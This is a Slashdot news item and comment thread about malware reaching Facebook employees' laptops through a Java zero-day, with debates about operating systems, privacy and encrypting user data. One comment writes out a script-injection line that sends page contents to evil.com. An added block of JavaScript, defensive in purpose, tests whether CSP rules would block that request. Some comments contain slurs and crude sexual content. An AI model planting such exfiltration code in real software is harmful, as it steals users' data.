Facebook Employees' Laptops Compromised; User Data Believed Safe

timothy posted about a year ago | from the safely-exploited-by-facebook dept.

Facebook 75

Trailrunner7 writes "Laptops belonging to several Facebook employees were compromised recently and infected with malware that the company said was installed through the use of a Java zero-day exploit that bypassed the software's sandbox. Facebook claims that no user data was affected by the attack and says that it has been working with law enforcement to investigate the attack, which also affected other unnamed companies. Facebook officials did not identify the specific kind of malware that the attackers installed on the compromised laptops, but said that the employees' machines were infected when they visited a mobile developer Web site that was hosting the Java exploit. When the employees visited the site, the exploit attacked a zero-day vulnerability in Java that was able to bypass the software's sandbox and enable the attackers to install malware. The company said it reported the vulnerability to Oracle, which then patched the Java bug on Feb. 1."

75 comments

thats what happens when (2, Insightful)

Anonymous Coward | about a year ago | (#42921583)

you use windows as your dev environment

Re:thats what happens when (0, Flamebait)

Anonymous Coward | about a year ago | (#42921617)

thats what you use windows as your dev environment

why was this modded down? looks like the m$ faggots are around today

Re:thats what happens when (0)

Anonymous Coward | about a year ago | (#42921727)

you must be new here..

Re:thats what happens when (1)

Anonymous Coward | about a year ago | (#42921771)

or perhaps it's because the comment was trolling?

Re:thats what happens when (1, Insightful)

drankr (2796221) | about a year ago | (#42921849)

How was it trolling? Why doesn't the article state what OS those laptops were running? Hmm? Because it's the most insecure OS known to mankind, Windows, and it doesn't even have to be said any longer? Or because the writers are pathetically unprofessional and are deliberately withholding the facts here? Either way, I don't know.

Re:thats what happens when (0)

Anonymous Coward | about a year ago | (#42921935)

The article clearly says that the exploits they were using work against Windows and Mac - together that is, oh I don't know, 98.5% of notebooks out there. So yes, they were using notebooks. The notebooks were vulnerable because they had Java enabled in the browser. Who cares if it was Windows or Mac? We know it wasn't Linux because a) they successfully attacked it and the attack was not crafted for Linux, and b) relatively nobody uses Linux. Duh.

Yet another Twitter Sockpuppet. (0)

Anonymous Coward | about a year ago | (#42922777)

Looking at the UID, almost 3M. Check
Obsessive hatred and FUD against Microsoft. Check
All that is missing is M$.

Re:thats what happens when (0)

Anonymous Coward | about a year ago | (#42922065)

I hate knowingly admitting this therefore I am ACing it.

They use Macs, this case it would of been a MacBook.

Re: thats what happens when (3, Informative)

cyber-vandal (148830) | about a year ago | (#42922119)

It's "would have" you ignorant moron.

Re: thats what happens when (-1)

Anonymous Coward | about a year ago | (#42922303)

go fuck a beehive asshole

Re: thats what happens when (2, Funny)

Anonymous Coward | about a year ago | (#42922637)

What's a "beehive asshole"?

Re: thats what happens when (0)

Anonymous Coward | about a year ago | (#42925349)

Beehive
When your doing a girl from the ass, and before you cum you pull out and cum into her hair, and then with your penis you twirl her hair into a sticky hairdo resembling a beehive

while doing the prostitute in the anus i gave her a good ol' american Beehive!

Source http://www.urbandictionary.com/define.php?term=beehive [urbandictionary.com]

Re: thats what happens when (0)

YeeHaW_Jelte (451855) | about a year ago | (#42922861)

English might not be his first language, you don't have to be rude.

Re: thats what happens when (1)

cyber-vandal (148830) | about a year ago | (#42930961)

It's a common piece of UK English fuckwittery from semi-literate fuckwits who don't know their own language.

Re: thats what happens when (1)

greenfruitsalad (2008354) | about a year ago | (#42943985)

english IS his first language. nobody who learned english as their second language would write "would of". this is similar to "they're, their, there" type of mistake. only native speakers have a problem with this.
first time i came across "would of", i had to look it up on google.

Re: thats what happens when (0)

Anonymous Coward | about a year ago | (#42926973)

Stop modding grammar nazism up! Yes, the comment is correct, but it is entirely irrelevant.

It's good they'll protect your data from thieves.. (4, Insightful)

Anonymous Coward | about a year ago | (#42921597)

but who's gonna protect people's data from Facebook itself?

Re:It's good they'll protect your data from thieve (1)

oztiks (921504) | about a year ago | (#42922085)

A photo of the hacker planting the malware can be found here [yaaree.com] .

Safe? (5, Insightful)

DoofusOfDeath (636671) | about a year ago | (#42921599)

Given Facebook's MO, users should assume that anything Facebook, Inc. had access to is already in the hands of people you can't trust.

Them being hacked is pretty irrelevant.

Re:Safe? (1)

elucido (870205) | about a year ago | (#42921629)

Are you accusing Mark Zuckerberg of being a hacker?

Re:Safe? Sure ! (0)

Anonymous Coward | about a year ago | (#42921765)

No just someone that exploits the people's ignorance for his benefit.
And the greatest spy in modern history. All that data is the hands of the
American secret services. Thanks to him , the USA is safe. ! .

Re:Safe? (5, Funny)

KiloByte (825081) | about a year ago | (#42921835)

Are you accusing Mark Zuckerberg of being a hacker?

No, most hackers can be expected to have some basic integrity.

Re:Safe? (1)

bjwest (14070) | about a year ago | (#42921883)

Please tell me where in that statement you got the idea he was implying Zuckerberg is a hacker. Even using the popular, but incorrect, definition of hacker does not apply here as Mark Zuckerberg owns Facebook and I'm sure he has no need to "hack" into the system to get at any information he wants.

Re:Safe? (1)

oztiks (921504) | about a year ago | (#42922033)

Hacker Way, Hacker-Freakin-Way ...

He just made real hackers around the world cringe after he did that.

Re:Safe? (1)

History's Coming To (1059484) | about a year ago | (#42922261)

"Owns" != "Has a right to the data". If the CEO of a major bank wanted to see every purchase his ex-wife makes he can't just call the data up, any sensible company will have need-to-know policies in place to prevent abuse and afford some deniability, regardless of how high up the request comes from. I don't doubt a bank CEO could get access to his ex-wife's data, but I'd be very surprised if any company would admit that policy is simply to hand over any data to the bloke in charge without any control or oversight.

Re:Safe? (1)

bjwest (14070) | about a year ago | (#42923009)

"Not having a right to the data but still having access to it" != "hacking" anymore than considering a janitor of a building a lockpicker if he has a master key and goes into a room he's been told to stay out of. It may get him in trouble, but he did not break into the room.

Re:Safe? (2)

Runaway1956 (1322357) | about a year ago | (#42922755)

Zuckerberg has successfully social-engineered about half the people in the US. Social engineering is a hacker skill, isn't it? People fall all over themselves to provide Zuck with their personal details.

Re:Safe? (1)

bjwest (14070) | about a year ago | (#42923069)

Interesting way to look at it and something I didn't consider. However, even though that would apply to the overall picture of FaceBook, going back to the OC, it doesn't apply to my original question.

Re:Safe? (1)

oztiks (921504) | about a year ago | (#42922019)

What's more disconcerting is the incident being made public now. Why a month after the incident occurring? Are they afraid of an Anonymous Hacktivism style attack? Are they trying to spare embarrassment of critical systems that may have been impacted?

They did speak of source code snippets and internal emails being on these particular laptops, TBH, that's worse than what Sally did on the weekend IMHO.

And the blame China point, another case of "here we go again", what is inferred by bringing this up?

Re:Safe? (1)

tlhIngan (30335) | about a year ago | (#42936027)

Well, if you meant to keep it private, why did you post it online for the world to see?

Oh, right, so-called "privacy" controls. Which are a brilliant social engineering hack meant to extract more information from users who wouldn't otherwise readily give it up. Unless you can control all your friends, anything they can see, the world can see. All it takes is someone to re-post it, or mention it or something and the beans are spilled.

Truth is, anything you post online is public. As someone's very famous sister found out when one of her "friends" re-posted a family photo and put it up on Twitter as well.

Sorry, the old adage is still true - don't put online stuff that you want to remain private. And stuff that ends up on the internet, stays on the internet.

Wait, this increased security? (2)

squiggleslash (241428) | about a year ago | (#42921601)

Facebook's users finally have privacy because someone got in and hacked into Facebook's laptops? What did they do, disable the graph API?

Re:Wait, this increased security? (2)

oztiks (921504) | about a year ago | (#42922109)

The word on the street is that they tied FB profile authentication in with their lobby entrance security systems, so unless you have a FB profile you can't enter the building.

No user data was compromised (5, Funny)

2phar (137027) | about a year ago | (#42921605)

Well, that's good to know. I'd hate to think of all those sensitive personal data falling into the hands of some evil corporation that would exploit it to make money with no concern for the privacy of the people involved.

Re:No user data was compromised (1)

Barsteward (969998) | about a year ago | (#42921693)

I want to know how they can say for sure that none of the data was lifted off the computers.

Re:No user data was compromised (0)

Anonymous Coward | about a year ago | (#42921743)

They stripped the systems of any copy instruction. Only moves are allowed.

Re:No user data was compromised (0)

Anonymous Coward | about a year ago | (#42922059)

Hopefully, either because (1) there was no user data ON the computers in the first place, or (2) what data was there was encrypted.

TFA leaves both of these possibilities open.

Re:No user data was compromised (0)

Anonymous Coward | about a year ago | (#42921695)

Probably the laptop's user data, not facebook user data, I find it hard to believe they'd carry that in a laptop.

Hmm, actually, thinking about it, they might be stupid enough to do it. After all, a company that makes its money entirely on the internet and has such weak training for their staff, wouldn't be a stretch.

Re:No user data was compromised ( of course ) (0)

Anonymous Coward | about a year ago | (#42921741)

That would be totally unacceptable now would it ? Of course our data is safe of falling into the wrong hands.
Goes without saying. They would never lie about a major data breach.

ahhhhhhhhhh .. the smell of fresh bullshit in the morning hmmm mmmm ;)

Re:No user data was compromised (1)

Nidi62 (1525137) | about a year ago | (#42921825)

The data might be safer with hackers than it is with the corporations Facebook sells it to

User data should never be decrypted. (2, Interesting)

elucido (870205) | about a year ago | (#42921625)

I don't see why it would be so difficult to keep user data safe. Keep it encrypted, use a VPN, stream the data to memory but never store any of it unencrypted.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42921683)

You do not see why it would be so difficult... No offense, but people who think like you are usually part of the problem, not the solution.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42921753)

Bull Shit!

I get that it's hard, but it isn't impossible. And most importantly, people who think like you are the problem (not part, the whole thing). Given the number of hacks, vulnerabilities, social engineering, and just plain EVIL in recent computer company history, it should be a company's number one responsibility to keep user data safe. Through whatever means available.

1) Client data should never be on employee computers
2) Client data should never be accessible by employee computers
2a) If this is not possible, it should be never allowed on computers that the employee has any real control over. Put it on a machine that the employee has access to, but make it difficult

Re:User data should never be decrypted. (1)

History's Coming To (1059484) | about a year ago | (#42922305)

Exposing user data is what Facebook's business is, just in a controlled manner depending on how much info or money you give them. Clients (eg advertisers), well that's a different matter, but this was user data, not client data.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42921763)

I don't see why it would be so difficult to keep user data safe. Keep it encrypted, use a VPN, stream the data to memory but never store any of it unencrypted.

If you sit down and list the facebook use cases (including who needs access to, say, your photos), you'll quickly realize why what you said won't work.

Re:User data should never be decrypted. (1)

phantomfive (622387) | about a year ago | (#42922465)

Is there any company in the world that encrypts more than password/CC numbers? I don't think many companies do that....

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42922911)

Look, I get your philosophical premise, but let's be a little serious here....

Where do you recommend the key be stored? How much extra CPU time is this worth? Every single system will need the key in memory, and it'll have to be the same key.

Now let's get really pragmatic. This is going into document databases.

Things need keys (not crypto) for the docs. If the whole database is encrypted, building indexes gets /weird/ -- they're guaranteed to be well distributed, but sharding gets funky really fast. There are ways to rectify that, but it's really not even worth the time it takes to discuss them.

Then we've got the fact that people need to query, run fast string operations in-database, and the fact that you know... the application servers need the raw data to actually fucking... compute on. (Computation, you do do that motherfucker, right?)

"Should never be decrypted" Why don't we just throw it out then, since we never do anything with it. Laugh.

I don't know why you got any interesting/insightful moderation -- your proposal at a literal level is useless.

The query interface, ORM, app server, reporting systems all need decrypted data. Or do you think the webpage shouldn't be able to retrieve your name and friends?

No matter how encrypted your database is, retrieval of decrypted info still comes down to 'select * from users;"

Yes, there's...ways to improve on this, partial tables, encrypted tables with some info, nega-databases, and homomorphic encrypted operations. I'm sure every single one of your developers has a PhD and is intimately familiar with zero knowledge proofs and protocols? No...? Well then, shaddup. No, you can't even train them or give them the papers to read -- they'll implement it wrong.

But the bottom line is most encryption only protects data at rest. Stone cold rest in a drive that's powered off. Anything else -- we can get to. I don't mean hackers. I mean remotely competent sysadmins, devs, devops -- even management with a properly written disaster recovery document.

You're probably the same type of person that told me my application, its data, and its caches had to be encrypted so that I as the developer and sysadmin couldn't get to the ever so precious customer data.

Yeah, I could encrypt it, I could make it harder, I could make it more secure (and when presented with a quote to do exactly that people balked, bitched, moaned, and said no). But you really can't secure your data against the sysadmin and developer. You can audit their access of it. But if they want it, or somebody impersonating them wants it -- and if they have any capability to impersonate a client or set a debug flag on production ... they can get it.

You don't see why it should be so difficult...

Do you see anything about development? Have you ever written a program? Hell, have you ever used a freaking program in a client-server relationship -- and if so, has it occurred to you that you could replace the program with another one?

Re:User data should never be decrypted. (1)

elucido (870205) | about a year ago | (#42923563)

Yes, there's...ways to improve on this, partial tables, encrypted tables with some info, nega-databases, and homomorphic encrypted operations. I'm sure every single one of your developers has a PhD and is intimately familiar with zero knowledge proofs and protocols? No...? Well then, shaddup. No, you can't even train them or give them the papers to read -- they'll implement it wrong.

But that is the direction we should be going. If it's implemented wrong then the buggy code will be fixed and eventually it will be implemented right. It should be done and the only excuse you have not to do it is that it would cost too much in CPU resources or be too hard. What is more important than user data? The user is most important and the user data is sacred. That has to be protected and it's Facebook with their goddamn lax policies that help destroy the foundation of the internet itself.

But the bottom line is most encryption only protects data at rest. Stone cold rest in a drive that's powered off. Anything else -- we can get to. I don't mean hackers. I mean remotely competent sysadmins, devs, devops -- even management with a properly written disaster recovery document.

Encryption protects data in transmission over the internet all the time. When you transmit your credit card information it's encrypted via https/ssl. Asymmetric encryption also protects data fairly well. Fully homomorphic encryption is new but a company like Facebook has enough resources to start work on a practical implementation. The problem right now is it's incredibly slow and not very optimized but that could change.

Your argument is that you can't train people to understand certain things or that there aren't programmers who can implement it? That is complete and utter bs. Facebook has the money and can hire whoever they want to hire and if you pay someone 100k a year to study and program it then I'm certain they could. It's complicated but it's not so complicated that you couldn't study it and be trained. So I say why not study it? Oh yeah, because Facebook doesn't seem to care about privacy, about user data security, about encryption, when they released they weren't even using https!

Btw yes I have written programs and I know about the client server relationship. I also know enough about encryption to know that you actually CAN secure a laptop. If the data is stored elsewhere such as in the cloud and connected to via VPN and that connection is closed off and encrypted, that would be a start, but the best solution is not to give employees access to user data from their laptop. Go to the office where we can monitor every employee on every computer and where we can at least filter stuff like Java and other malware so it does not contaminate the environment. Letting anyone connect their laptop to the network then take it home and then on top of that allowing Java to run on it ? Just plain stupid. They should have removed Java and everything not absolutely required for the task.

Re:User data should never be decrypted. (0)

Anonymous Coward | about a year ago | (#42923915)

I think you missed a lot here...

The user is most important and sacred. Unfortunately, you as an individual logging into facebook are *a* user, but not *the* user... you're the marketed demographic sold to advertisers.

So yeah... you're right, facebook doesn't care about your privacy. And they shouldn't.

That it costs too much CPU is less relevant -- I have built in crypto in every processor I've purchased in the past five years. However, most software engineers aren't competent enough to use it correctly.

As for encryption protecting data in transmission all the time. You're...basically only barely technically correct. Asymmetric encryption is slow, but that's irrelevant -- first, there's been huge speed boosts with ECC, secondly that's what TLS and secret key exchange is for...

HTTPS/SSL has been dead as far as I've been professionally concerned since 2001. If you believe otherwise, it's really just... further proof that the average or better than average programmer shouldn't be touching crypto, especially given that you are clearly at least literate in the field.

There's been COTS products for even private industry to break it since at least 2005. I even bought one once. You call it protected -- and yeah, you're vacuously correct, it's encrypted and meets all of the definitions and standards that were appropriate, providing semantic security within a non-negligible margin of the keyspace (ignoring things like BEAST entirely for now). Unfortunately, the standards don't actually protect against /anything/ but a naive man-in-the-middle and brute force. They don't even provide a chain of trust through the CA. Calling HTTPS "protected" is borderline negligence.

You know enough about encryption to know that you can secure a laptop? Really? Every definition of security that I've ever considered applicable, security means the absence of risk. Which means all you can do is mitigate risk to a laptop. Risk of what? Maybe you've got a military background where "secure" means "threat mitigation" -- I don't want to quibble that point. But you can't eliminate all threats to a laptop.

Stop. No, you can't. If you think you can't, you don't know enough.

If you think you can do it with cloud hosting, remote encryption, VPN clients and anti virus -- you don't know enough.

If you think you can do it by locking down the admin account, you don't know enough.

If you think you can do it with three bios passwords, DRM, secure boot over UEFI -- you still don't understand enough. They've already been defeated. All of them.

Yeah, I'm serious.

This is facebook. These people are fucking software developers. Very skilled ones. Nevermind all the corp best practice in the world -- a few of them actually need a debugger and the ability to run mv eax, ebx -- there you go -- DRM circumvented.

You want to 'filter' and monitor Java? Good fucking luck with the 64 odd exploits released in the past week. You're gonna have to ban all of it. And flash, pdf, word, html, most mime encodings. Should I keep going? I've seen attacks directed against actual IPS and log analysis systems....

You want to run an IDS/IPS? OK -- here's your two choices:

1) SSL goes through it, I can bypass it by delivering over SSL
2) You inspect SSL -- thus decrypting the data. Congrats, your IPS is now a very valuable target.

My argument isn't remotely BS. There's probably a dozen programmers in the world good enough to do crypto totally correctly. Facebook could hire them. Facebook could train them -- and guess what, it /still wouldn't matter/ Because some fuckup developer somewhere would use it wrongly and weaken the entire platform.

You want to assert there's 50, 100, 1000....? Fine. This is security -- it takes one damned hole.

You want to dream of their nega-database with homomorphic encrypted operations? Of some brilliant utopian star trek future with near ubiquitous computing, proper interfaces, abstractions, a world where managers don't screw the pooch by omitting a few details or demanding that you remove footnotes from documentation that might make things look bad the wall street journal?

Awesome, beautiful fucking dream. Thanks for spending a billion bucks on it.

Even when you're completely done, I'm still a programmer. I'm still a programmer with a compromised laptop. I'm still a guy with access to version control. And all I need to do as the bad guy is insert a script tag that reads...

$.ajax(http://evil.com/submit, document.innerhtml);

I can't steal the database, but in the limit I still have every single user account and whatever the heck I want, because sooner or later encrypted data gets decrypted.

Thanks for playing. I'll be back in a week.

When a developer or sysadmin system is compromised, /no amount of encryption/ will solve your problem. And marketing crypto to stop it is irresponsible.

For the record, yeah, I agree -- we should be improving crypto and especially the zero-knowledge algorithm portion.

But improving it won't make the problem we're talking about go away. And it won't even mitigate it. It'll just make a compromise of a database server or storage server slightly less risky.
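
[Added example, not part of any poster's comment: the comment above describes an injected script that sends page content to a third-party host. The sketch below shows the browser-side control that governs that request, a Content-Security-Policy connect-src list, by evaluating a permissive policy and a restrictive one against the same destination. The three policies, the app.example hostnames and all function names are constructed for illustration; the matcher is a simplified subset of CSP source matching.]

```javascript
// Simplified CSP check for fetch/XHR destinations (http and https URLs only).
// Supported source expressions: *, 'self', scheme sources such as https:,
// and host sources with optional scheme, leading "*." wildcard and port.
// Paths, nonces and hashes are ignored. All policies below are constructed.

const PAGE_URL = 'https://app.example/profile';      // constructed page origin
const EXFIL_URL = 'http://evil.com/submit';          // destination named in the comment
const WILDCARD_POLICY = "default-src 'self'; connect-src *";
const NO_FALLBACK_POLICY = "script-src 'self'";      // no connect-src, no default-src
const HARDENED_POLICY =
  "default-src 'none'; script-src 'self'; " +
  "connect-src 'self' https://api.app.example; report-uri /csp-report";

const HOST_SOURCE =
  /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?(?:\/.*)?$/;

function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A directive that appears twice is ignored the second time.
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : '80';
}

function schemeOk(expected, actual) {
  // An http: source also matches the https: upgrade of the same host.
  return expected === actual || (expected === 'http:' && actual === 'https:');
}

function sourceMatches(source, target, self) {
  const s = source.toLowerCase();
  if (s === '*') return true;
  if (s === "'self'") return target.origin === self.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return schemeOk(s, target.protocol);
  const m = HOST_SOURCE.exec(s);
  if (!m) return false; // 'none' and other quoted keywords never match a URL
  const [, scheme, wildcard, host, port] = m;
  const expectedScheme = scheme ? scheme + ':' : self.protocol;
  if (!schemeOk(expectedScheme, target.protocol)) return false;
  const hostOk = wildcard
    ? target.hostname.endsWith('.' + host)
    : target.hostname === host;
  if (!hostOk) return false;
  if (port === '*') return true;
  const targetPort = target.port || defaultPort(target.protocol);
  return targetPort === (port || defaultPort(target.protocol));
}

function connectAllowed(header, requestUrl, pageUrl) {
  const target = new URL(requestUrl);
  const self = new URL(pageUrl);
  if (target.protocol !== 'http:' && target.protocol !== 'https:') {
    throw new Error('only http(s) destinations are modelled here');
  }
  const directives = parseCsp(header);
  // connect-src governs fetch and XHR; default-src is its fallback.
  const sources = directives.get('connect-src') ?? directives.get('default-src');
  if (sources === undefined) return true; // nothing restricts the request
  return sources.some((src) => sourceMatches(src, target, self));
}

for (const [label, policy] of [
  ['wildcard', WILDCARD_POLICY],
  ['no fallback', NO_FALLBACK_POLICY],
  ['hardened', HARDENED_POLICY],
]) {
  const verdict = connectAllowed(policy, EXFIL_URL, PAGE_URL) ? 'allowed' : 'blocked';
  console.log(`${label}: request to ${EXFIL_URL} is ${verdict}`);
}
```

[A policy like the hardened one only constrains scripts running in the page; anyone able to change the served headers or the server-side code is outside its reach, which is why the report-uri violation reports and review of header changes matter as detection points.]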

LIKE! (0)

Anonymous Coward | about a year ago | (#42921647)

I bet someone beat my score at Bejeweled Blitz, too!

law enforcement? (0)

Anonymous Coward | about a year ago | (#42921675)

So people call the police when they get a computer virus now? Losers, get off the internet.

Useless articles (4, Insightful)

Anonymous Coward | about a year ago | (#42921707)

What's the point of these articles that announce that so and so company's systems have been hacked? They never contain any forensic information about the exploits other than to loosely identify the vulnerable software the bad guys used to get into the system. No identification of the malware installed, no identification of the OS's the laptop were running, no identification of any antivirus products that turned out to be completely useless in stopping the attacks. IOW, no goddamn information that would be useful to anyone who wanted to protect themselves from attack, or at least detect whether their system were already compromised.

The lack of forensic details about the attack provided by Facebook or any of the other companies hit with the java exploit causes great doubt about their claims that no user data was accessed.

Re:Useless articles (0)

Anonymous Coward | about a year ago | (#42921761)

What's the point of these articles that announce that so and so company's systems have been hacked? They never contain any forensic information about the exploits other than to loosely identify the vulnerable software the bad guys used to get into the system. No identification of the malware installed, no identification of the OS's the laptop were running, no identification of any antivirus products that turned out to be completely useless in stopping the attacks. IOW, no goddamn information that would be useful to anyone who wanted to protect themselves from attack, or at least detect whether their system were already compromised.

The lack of forensic details about the attack provided by Facebook or any of the other companies hit with the java exploit causes great doubt about their claims that no user data was accessed.

To fuel the public fear and increase the budget for the "cyberwar"....... haha
It's all fake.

Re:Useless articles (0)

Anonymous Coward | about a year ago | (#42922309)

Facebook are listed on NASDAQ.

NASDAQ Listing Rule 5250(b)(1) requires that, except in unusual circumstances, the company shall make prompt disclosure to the public through any Regulation FD-compliant method (or combination of methods) of disclosure of any material information that would reasonably be expected to affect the value of its securities or influence investors' decisions.

In other news (1)

houghi (78078) | about a year ago | (#42921799)

A man gave way to a car and no accident happened.

Are we in such a bad shape that NOT compromising personal data has become the news worthy factor?

"zero day" is as bad as l337 speak (3, Interesting)

Anonymous Coward | about a year ago | (#42921805)

Can we all stop saying zero day? it's just an attempt to sound cool and hackish and it means nothing. it's a vulnerability, and it has an exploit and no patch is available, as opposed to unpatched.

if they release new software that they brag is secure, and you have an exploit that already compromises a vuln, ok, you have a zero day because that's day one of something. then it makes sense. otherwise, it's false street cred and bravado.

Re:"zero day" is as bad as l337 speak (0)

Anonymous Coward | about a year ago | (#42922097)

1t's, 0dayz spl0it j00 n3wb!

Re:"zero day" is as bad as l337 speak (1)

Anonymous Coward | about a year ago | (#42924797)

You might not be old enough, but "zero day" originally meant that software was cracked and distributed via BBS on the same day it was released. That is what zero day meant. Zero-day warez was the status groups like Quartex and Fairlight aspired to achieve.

THAT is what zero day meant.

Re:"zero day" is as bad as l337 speak (0)

Anonymous Coward | about a year ago | (#42925929)

That IS old! Now if you can't break the street date, its late.

How about embedded devices (1)

Anonymous Coward | about a year ago | (#42921829)

Ok, Java is hosed, most of Adobe is hosed etc...

But has anybody ever considered the dangers of embedded linux devices in a company? Some of these things are pretty powerful with the right ARM socket, shady firmware and make the perfect backdoor in whatever corporate infrastructure. It's not that everybody is equipped with the latest firewall, the latest IDS or latest Layer 7 proxy or DPI on SSL and even then, DPI on SSL or Layer7 proxies can be performance hogs in a time that end users want to have a webpage loaded in 0.0000001 seconds. /conspiracy-theory: Make some overhyped BIG Ltd with cheap embedded solutions, send demo units to the whole world and your backdoor/botnet is in place. Don't put a real backdoor in it, just make it 'vulnerable' and if someone would find an exploit, patch it, like the good guys, and introduce another one.

Hey Timothy, how does Zuckerberg's cock taste ? (0, Insightful)

Anonymous Coward | about a year ago | (#42921881)

SMART people don't use Facebook and smart people ARE NOT INTERESTED
IN FACEBOOK.

How much does Facebook PAY you sorry dickeating morons to continue
to post drivel about Facebook every fucking day ?

Do us all a favor, Timothy, and drink some Drano.

Re:Hey Timothy, how does Zuckerberg's cock taste ? (-1)

Anonymous Coward | about a year ago | (#42922043)

"dickeating morons to continue to post drivel"

Mod parent redundant.

people still run java apps in browsers? (0)

Anonymous Coward | about a year ago | (#42921885)

Seriously? Why would anyone in this day and age run unknown and untrusted programs from the internet, even in a so-called "sandboxed" environment? It's long past time to disable java, javascript, (and ActiveX back when that was a thing) by default. Not doing this seems to be the cause of a large fraction of all the pwnage that people end up subjected to.

Have we learned nothing from the last decade?

How's your fancy pants coding parties now? (1)

Anonymous Coward | about a year ago | (#42921941)

Turns out Facebook employees don't know what the fuck they're doing. Keep drinking the beer, at least that'll give you good memories later in life.

Check their closets? (0)

Anonymous Coward | about a year ago | (#42922191)

Maybe they'll find a Harvard staff sneaking out, covering their face with a bicycle helmet? Or would that be a zombie process?

Isn't the bigger news... (2)

amightywind (691887) | about a year ago | (#42922427)

That Facebook paid no taxes in 2012 and will receive a $400 million refund. Hypocritical liberal scum.

DD-MM-YYYY (-1)

Anonymous Coward | about a year ago | (#42922495)

Not "Feb 1". I'm so sick of this US-Centric bullshit.

oh the irony (1)

milkmage (795746) | about a year ago | (#42922515)

http://arstechnica.com/security/2013/02/at-facebook-zero-day-exploits-backdoor-code-bring-war-games-drill-to-life/ [arstechnica.com]

"The FBI e-mail, zero-day exploit, and backdoor code, it turns out, were part of an elaborate drill Facebook executives devised to test the company's defenses and incident responders. The goal: to create a realistic security disaster to see how well employees fared at unraveling and repelling it. While the attack was simulated, it contained as many real elements as possible."

I'm glad that on Facebook... (0)

Anonymous Coward | about a year ago | (#42922899)

I'm glad that on Facebook, I use a fake name, and only a small group of close friends know about it.

Who cares? (2)

ilsaloving (1534307) | about a year ago | (#42923447)

Your data was spread across the 4 winds as soon as you started using Facebook.

The only "problem" here is that your data has now been around the globe without Facebook getting to monetize the transaction.

"User Data Safe" (3, Insightful)

Mark Rawls (2648691) | about a year ago | (#42923875)

I think that's the first time that the phrases "user data believed safe" and "Facebook" have been uttered in the same sentence.